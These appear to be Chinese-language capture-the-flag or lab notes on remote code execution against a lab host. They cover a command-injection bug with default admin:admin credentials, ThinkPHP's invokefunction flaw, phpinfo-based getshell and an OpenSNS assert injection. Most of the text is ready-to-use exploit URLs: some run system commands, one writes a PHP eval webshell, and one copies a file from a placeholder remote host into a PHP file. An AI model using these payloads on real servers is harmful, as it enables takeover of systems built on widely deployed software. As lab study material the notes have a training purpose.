原因:
命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台路径:/manager 后台密码:admin:admin
解决方案:
拼接指令cmd = ls /tmp
cmd就是执行shell的命令
常见的flag一般都是在/tmp页面下
注意‘ ’的符号是%20 ,后面玩捉迷藏有时候会用到这个点。
原因:
由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。
解决方案:
http://10.11.12.28:24050/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/tmp
http://10.11.12.28:24050/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20@eval($_POST[pass])?%3E
原因
phpinfo()常用于在系统上检查配置设置和预定义变量。 通过写入脚本文件,然后读取从而getshell
http://10.11.12.28:20756/phpinfo.php
原因
OpenSNS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限
http://10.11.12.28:61968/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()
http://10.11.12.28:61968/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=copy(%27http://xxx/a.txt%27,%27a.php%27)